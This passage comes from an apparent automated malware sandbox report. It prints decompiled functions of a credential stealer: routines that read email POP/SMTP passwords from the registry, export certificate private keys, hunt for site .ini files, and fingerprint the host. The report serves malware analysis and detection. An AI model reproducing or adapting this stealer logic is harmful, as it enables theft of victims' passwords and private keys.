                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • #696.MSVBVM60(00403CA4), ref: 00421A4B
                                                                        • __vbaSetSystemError.MSVBVM60(0148CB63,00000000,00403CA4), ref: 00421A66
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: #696ErrorSystem__vba
                                                                        • String ID:
                                                                        • API String ID: 1682638366-0
                                                                        • Opcode ID: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
                                                                        • Instruction ID: cd24f5d89f5410eae393ec7b077bea812e3d8d252e5c27202905309d8a94c185
                                                                        • Opcode Fuzzy Hash: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
                                                                        • Instruction Fuzzy Hash: 5CD0223520A60129E108BEBB848AB3B29880F54F0DF20403F7200FA4D2CABC8400202F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(0000000F,00000000,?,00000100), ref: 04B201EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
                                                                        • Instruction ID: 6b619fe5903561007c33ba945a8ea2cd0f7fbb84f24d2eb671bfdc5f6933437f
                                                                        • Opcode Fuzzy Hash: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
                                                                        • Instruction Fuzzy Hash: D6019E12A401B977EA342E6C8F4DBFE2315FBA3759F640BC2E62E9216E99217C034241
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 51%
                                                                        			E004218A6(void* __ebx, void* __edi, void* __esi, char __fp0, signed int _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v28;
                                                                        				intOrPtr _v36;
                                                                        				char _v44;
                                                                        				char _v64;
                                                                        				void* _t36;
                                                                        				intOrPtr* _t37;
                                                                        				void* _t38;
                                                                        				void* _t43;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				intOrPtr* _t58;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				signed int _t64;
                                                                        				void* _t65;
                                                                        				void* _t67;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t68 = _t67 - 0xc;
                                                                        				 *[fs:0x0] = _t68;
                                                                        				_v16 = _t68 - 0x44;
                                                                        				_v12 = 0x4010a0;
                                                                        				_t63 = _a4;
                                                                        				_v8 = _t63 & 0x00000001;
                                                                        				_t64 = _t63 & 0xfffffffe;
                                                                        				_a4 = _t64;
                                                                        				 *((intOrPtr*)( *_t64 + 4))(_t64, __edi, __esi, __ebx,  *[fs:0x0], 0x4010b6, _t65);
                                                                        				_v44 = 0;
                                                                        				_push( &_v44);
                                                                        				_v28 = 0;
                                                                        				_v64 = 0;
                                                                        				_v36 = 0x80020004;
                                                                        				_v44 = 0xa;
                                                                        				L0040116A();
                                                                        				_v64 = __fp0;
                                                                        				L00401164();
                                                                        				_t70 =  *0x4229d4; // 0x2961b2c
                                                                        				if(_t70 == 0) {
                                                                        					_push(0x4229d4);
                                                                        					_push(0x403c80);
                                                                        					L0040115E();
                                                                        				}
                                                                        				_t58 =  *0x4229d4; // 0x2961b2c
                                                                        				_t36 =  *((intOrPtr*)( *_t58 + 0x4c))(_t58,  &_v28);
                                                                        				asm("fclex");
                                                                        				if(_t36 < 0) {
                                                                        					_push(0x4c);
                                                                        					_push(0x403c70);
                                                                        					_push(_t58);
                                                                        					_push(_t36);
                                                                        					L00401158();
                                                                        				}
                                                                        				_t37 = _v28;
                                                                        				_t59 = _t37;
                                                                        				_t38 =  *((intOrPtr*)( *_t37 + 0x20))(_t37,  &_v64);
                                                                        				asm("fclex");
                                                                        				if(_t38 < 0) {
                                                                        					_push(0x20);
                                                                        					_push(0x403c90);
                                                                        					_push(_t59);
                                                                        					_push(_t38);
                                                                        					L00401158();
                                                                        				}
                                                                        				L00401152();
                                                                        				if( ~(0 | _v64 != 0x00000000) != 0) {
                                                                        					_t49 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
                                                                        					if(_t49 < 0) {
                                                                        						_push(0x6fc);
                                                                        						_push(0x403a74);
                                                                        						_push(_t64);
                                                                        						_push(_t49);
                                                                        						L00401158();
                                                                        					}
                                                                        				}
                                                                        				_t76 =  *0x422010; // 0x5cfb60
                                                                        				if(_t76 == 0) {
                                                                        					_push(0x422010);
                                                                        					_push(0x402bdc);
                                                                        					L0040115E();
                                                                        				}
                                                                        				_t61 =  *0x422010; // 0x5cfb60
                                                                        				_t43 =  *((intOrPtr*)( *_t61 + 0x2b4))(_t61);
                                                                        				asm("fclex");
                                                                        				if(_t43 < 0) {
                                                                        					_push(0x2b4);
                                                                        					_push(0x403a40);
                                                                        					_push(_t61);
                                                                        					_push(_t43);
                                                                        					L00401158();
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t64 + 0x700))(_t64);
                                                                        				_t47 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
                                                                        				if(_t47 < 0) {
                                                                        					_push(0x6fc);
                                                                        					_push(0x403a74);
                                                                        					_push(_t64);
                                                                        					_push(_t47);
                                                                        					L00401158();
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				asm("wait");
                                                                        				_push(E00421A29);
                                                                        				return _t47;
                                                                        			}

                                                                        APIs
                                                                        • #593.MSVBVM60(?), ref: 00421903
                                                                        • __vbaFreeVar.MSVBVM60(?), ref: 0042190E
                                                                        • __vbaNew2.MSVBVM60(00403C80,004229D4,?), ref: 00421925
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,02961B2C,00403C70,0000004C), ref: 00421949
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 0042196C
                                                                        • __vbaFreeObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 00421980
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 004219A3
                                                                        • __vbaNew2.MSVBVM60(00402BDC,00422010), ref: 004219BA
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,005CFB60,00403A40,000002B4), ref: 004219E0
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 00421A07
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: __vba$CheckHresult$FreeNew2$#593
                                                                        • String ID:
                                                                        • API String ID: 734493984-0
                                                                        • Opcode ID: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
                                                                        • Instruction ID: c2a4e496c33e5a95fca38fc57b841067e4aaf942ed9135cbc122c6ee08ed05d7
                                                                        • Opcode Fuzzy Hash: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
                                                                        • Instruction Fuzzy Hash: 0E419FB0B00219ABCB10AFA5CC89E9E7BB9AF59704F60043BF145B72A1C7785985CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 100%
                                                                        			E0040EC16(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				char* _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				char _v2100;
                                                                        				intOrPtr _v2104;
                                                                        				intOrPtr _v2108;
                                                                        				char _v2112;
                                                                        				intOrPtr _v2116;
                                                                        				intOrPtr _v2120;
                                                                        				char _v2124;
                                                                        				long _t93;
                                                                        				long _t94;
                                                                        
                                                                        				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t94 = _t93;
                                                                        				if(_t94 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2072 = E00401C8E(_a4, _v2068, "EmailAddress", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2068, "Technology", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2068, "PopServer", 0);
                                                                        						_v2084 = E00401C8E(_a4, _v2068, "PopPort",  &_v2088);
                                                                        						_v2092 = E00401C8E(_a4, _v2068, "PopAccount", 0);
                                                                        						_v2096 = E00401C8E(_a4, _v2068, "PopPassword",  &_v2100);
                                                                        						_v2104 = E00401C8E(_a4, _v2068, "_mtpServer", 0);
                                                                        						_v2108 = E00401C8E(_a4, _v2068, "_mtpPort",  &_v2112);
                                                                        						_v2116 = E00401C8E(_a4, _v2068, "_mtpAccount", 0);
                                                                        						_v2120 = E00401C8E(_a4, _v2068, "_mtpPassword",  &_v2124);
                                                                        						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014E8(_a12, _v2080);
                                                                        							E004014BC(_a12, _v2084, _v2088);
                                                                        							E004014E8(_a12, _v2092);
                                                                        							E004014BC(_a12, _v2096, _v2100);
                                                                        							E004014E8(_a12, _v2104);
                                                                        							E004014BC(_a12, _v2108, _v2112);
                                                                        							E004014E8(_a12, _v2116);
                                                                        							E004014BC(_a12, _v2120, _v2124);
                                                                        						}
                                                                        						E0040EC16(_a4, _v2068, _a12);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2096);
                                                                        						E004017D5(_v2104);
                                                                        						E004017D5(_v2108);
                                                                        						E004017D5(_v2116);
                                                                        						E004017D5(_v2120);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t94;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EC29
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040EC5D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF18
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$Technology$_mtpAccount$_mtpPassword$_mtpPort$_mtpServer
                                                                        • API String ID: 1332880857-669952401
                                                                        • Opcode ID: dd614440e08928df7971a556a3bfc9fdbc32906bff9ac93f75b2f841793f3445
                                                                        • Instruction ID: 8f7519f456700ac6ee7d3b9319165bdb56a4dd37101f5fed1b12cdcb20d8ff00
                                                                        • Opcode Fuzzy Hash: dd614440e08928df7971a556a3bfc9fdbc32906bff9ac93f75b2f841793f3445
                                                                        • Instruction Fuzzy Hash: 6171A33194011DBBDF226F51CC42BDDBAB6BF04704F1484FAB548750B5DB7A8AA1AF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E0040D423(intOrPtr __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				CHAR** _v16;
                                                                        				CHAR* _v20;
                                                                        				long* _v24;
                                                                        				char _v28;
                                                                        				long* _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _t48;
                                                                        				int _t50;
                                                                        				int _t54;
                                                                        				CHAR** _t59;
                                                                        				CHAR** _t62;
                                                                        				CHAR** _t66;
                                                                        				CHAR** _t71;
                                                                        				intOrPtr _t79;
                                                                        				CHAR** _t81;
                                                                        				void* _t82;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x48, 0);
                                                                        				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
                                                                        					_t48 =  *0x414431(0, 0x416057); // executed
                                                                        					_v12 = _t48;
                                                                        					if(_v12 != 0) {
                                                                        						_t82 = 0;
                                                                        						while(1) {
                                                                        							_t82 =  *0x414435(_v12, _t82);
                                                                        							_t94 = _t82;
                                                                        							if(_t82 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t79 =  *((intOrPtr*)(_t82 + 0xc));
                                                                        							_v16 =  *((intOrPtr*)(_t79 + 0x68));
                                                                        							_t81 =  *(_t79 + 0x6c);
                                                                        							__eflags = _t81;
                                                                        							if(__eflags != 0) {
                                                                        								while(1) {
                                                                        									__eflags = _v16;
                                                                        									if(__eflags == 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									_t50 = lstrcmpA( *_t81, "2.5.29.37");
                                                                        									__eflags = _t50;
                                                                        									if(_t50 == 0) {
                                                                        										__eflags = _t81[2];
                                                                        										if(_t81[2] != 0) {
                                                                        											_v20 = E004017EC(_t81[2]);
                                                                        											E00401823(_t81[3], _v20, _t81[2]);
                                                                        											_t54 = lstrcmpA(_v20, 0x416064);
                                                                        											__eflags = _t54;
                                                                        											if(_t54 == 0) {
                                                                        												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
                                                                        												__eflags = _t59;
                                                                        												if(_t59 != 0) {
                                                                        													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
                                                                        													__eflags = _t62;
                                                                        													if(_t62 != 0) {
                                                                        														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
                                                                        														__eflags = _t66;
                                                                        														if(_t66 != 0) {
                                                                        															_v40 = E004017EC(_v36);
                                                                        															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
                                                                        															__eflags = _t71;
                                                                        															if(_t71 != 0) {
                                                                        																E00401486(_a4, 0xbeef0000);
                                                                        																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
                                                                        																E004014BC(_a4, _v40, _v36);
                                                                        															}
                                                                        															E004017D5(_v40);
                                                                        														}
                                                                        														CryptDestroyKey(_v32);
                                                                        													}
                                                                        													CryptReleaseContext(_v24, 0);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v20);
                                                                        										}
                                                                        									}
                                                                        									_t81 =  &(_t81[4]);
                                                                        									_t40 =  &_v16;
                                                                        									 *_t40 = _v16 - 1;
                                                                        									__eflags =  *_t40;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        						}
                                                                        						 *0x414439(_v12, 0);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t79, _t94, _a4, _v8);
                                                                        			}

                                                                        APIs
                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
                                                                        • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D4C2
                                                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D547
                                                                        • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D55F
                                                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D578
                                                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D59D
                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 0040D5DB
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D5E6
                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D60E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                                        • String ID: 2.5.29.37
                                                                        • API String ID: 2649496969-3842544949
                                                                        • Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
                                                                        • Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00404C68(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t34;
                                                                        				CHAR* _t38;
                                                                        				void* _t42;
                                                                        				char* _t61;
                                                                        				char* _t62;
                                                                        				void* _t66;
                                                                        				signed int* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				_t66 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t34 = _a8;
                                                                        				if(_t34 == 0 ||  *_t34 == 0) {
                                                                        					L22:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					if(E004024D7(_a8) != 0) {
                                                                        						_t38 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t38 = E00401D15(_a8, "\*.*");
                                                                        					}
                                                                        					_v332 = _t38;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t42 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t42;
                                                                        					if(_t42 + 1 != 0) {
                                                                        						do {
                                                                        							_t67 =  &_v324;
                                                                        							if(( *_t67 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t67[0xb]);
                                                                        								if(StrStrIA(_v336, ".ini") != 0) {
                                                                        									_t61 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_push(_t61);
                                                                        									_push(_t61);
                                                                        									if(_a12 == 0) {
                                                                        										_t62 = 1;
                                                                        									} else {
                                                                        										_t62 = StrStrIA(_t61, "Sites\\");
                                                                        									}
                                                                        									_pop(_t68);
                                                                        									if(_t62 != 0) {
                                                                        										E00404C51(_a4, _t68);
                                                                        									}
                                                                        									E004017D5();
                                                                        								}
                                                                        							} else {
                                                                        								if(lstrcmpiA(0x414806,  &(_t67[0xb])) != 0) {
                                                                        									if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        										E00404C68(_t66, _a4, E00401D69(E00401D15(_a8, "\\"),  &( &_v324->cFileName)), _a12);
                                                                        										E004017D5(_t56);
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404CD8
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D01
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D1E
                                                                        • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DCD
                                                                        • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DE0
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$.ini$Sites\$\*.*
                                                                        • API String ID: 3040542784-999409347
                                                                        • Opcode ID: 361443fe5311b2d22f9cf9339d4b6dc14e685d45b6e12060e2e2ebf445a46234
                                                                        • Instruction ID: 5db4acfa8798974ae1da366c45271d1f2871770cf77317101492fac7cf3c5390
                                                                        • Opcode Fuzzy Hash: 361443fe5311b2d22f9cf9339d4b6dc14e685d45b6e12060e2e2ebf445a46234
                                                                        • Instruction Fuzzy Hash: E33163B1510109AADF21BF62DC02FEE7679AF84308F1441BBB608B50F1D77C9ED09A59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E004043DD(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				struct _OSVERSIONINFOA _v164;
                                                                        				char* _v168;
                                                                        				char _v172;
                                                                        				intOrPtr _v176;
                                                                        				struct _SYSTEM_INFO _v212;
                                                                        				struct HINSTANCE__* _v216;
                                                                        				int _t51;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr* _t75;
                                                                        				void* _t82;
                                                                        				struct _SYSTEM_INFO* _t85;
                                                                        				char* _t87;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0, 0);
                                                                        				E00401486(_a4, 0xbeef0001);
                                                                        				E00401803( &_v164, 0x9c);
                                                                        				_v164.dwOSVersionInfoSize = 0x9c;
                                                                        				_t51 = GetVersionExA( &_v164);
                                                                        				_t85 = 0;
                                                                        				_t86 = 0;
                                                                        				_t87 =  &(_v164.szCSDVersion);
                                                                        				while(_t85 < 0x80) {
                                                                        					__eflags =  *_t87;
                                                                        					if( *_t87 == 0) {
                                                                        						_t86 = 1;
                                                                        					}
                                                                        					_t86 = _t86;
                                                                        					__eflags = _t86;
                                                                        					if(_t86 != 0) {
                                                                        						 *_t87 = 0;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					_t85 =  &(_t85->dwOemId.dwOemId);
                                                                        					__eflags = _t85;
                                                                        				}
                                                                        				if(_t51 == 0) {
                                                                        					E004014BC(_a4, 0, 0);
                                                                        				} else {
                                                                        					E004014BC(_a4,  &_v164, 0x9c);
                                                                        				}
                                                                        				E00401486(_a4, E0040424A());
                                                                        				_v168 = E004017EC(0x400);
                                                                        				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
                                                                        				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
                                                                        				E00401486(_a4, E004042B2()); // executed
                                                                        				E0040434C(_t85, _t86); // executed
                                                                        				_t65 = E00402725(_t85, _t86, "HWID",  &_v172); // executed
                                                                        				_v176 = _t65;
                                                                        				if(_v176 == 0 || _v172 < 0x14) {
                                                                        					E004014BC(_a4, 0, 0);
                                                                        				} else {
                                                                        					_v172 = _v172 + 4;
                                                                        					E00401486(_a4, _v172);
                                                                        					_v172 = _v172 - 4;
                                                                        					E00401486(_a4, 0xffffffff);
                                                                        					E0040149B(_a4, _v176, _v172);
                                                                        				}
                                                                        				E004017D5(_v176);
                                                                        				E004017D5(_v168);
                                                                        				_t82 = 0;
                                                                        				_v216 = GetModuleHandleA("kernel32.dll");
                                                                        				if(_v216 != 0) {
                                                                        					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
                                                                        					if(_t75 != 0) {
                                                                        						_t86 =  &_v212;
                                                                        						 *_t75( &_v212); // executed
                                                                        						_t82 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t96 = _t82;
                                                                        				if(_t82 == 0) {
                                                                        					GetSystemInfo( &_v212);
                                                                        				}
                                                                        				E004014BC(_a4,  &_v212, 0x24);
                                                                        				return E00401553(_t86, _t96, _a4, _v8);
                                                                        			}

















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 00404426
                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 004044AB
                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 004044D4
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001,?), ref: 00404589
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004045A8
                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000), ref: 004045B8
                                                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001), ref: 004045C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                                        • API String ID: 1787888500-92997708
                                                                        • Opcode ID: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
                                                                        • Instruction ID: a5c158b064667e592a77a643291b10812bd144366de3c56d291d59684d6421bf
                                                                        • Opcode Fuzzy Hash: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
                                                                        • Instruction Fuzzy Hash: 07515E71A00218BEDF217BA1CC46F9D7A75AF81308F0080BAB748750F1DBB95AD09F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040890D(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char** _v336;
                                                                        				char* _v340;
                                                                        				char* _t30;
                                                                        				void* _t36;
                                                                        				int _t39;
                                                                        				char* _t48;
                                                                        				void* _t54;
                                                                        
                                                                        				_t54 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t30 = _a8;
                                                                        				if(_t30 == 0 ||  *_t30 == 0) {
                                                                        					L14:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_v332 = E00401D15(_a8, "\*.*");
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t36 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t36;
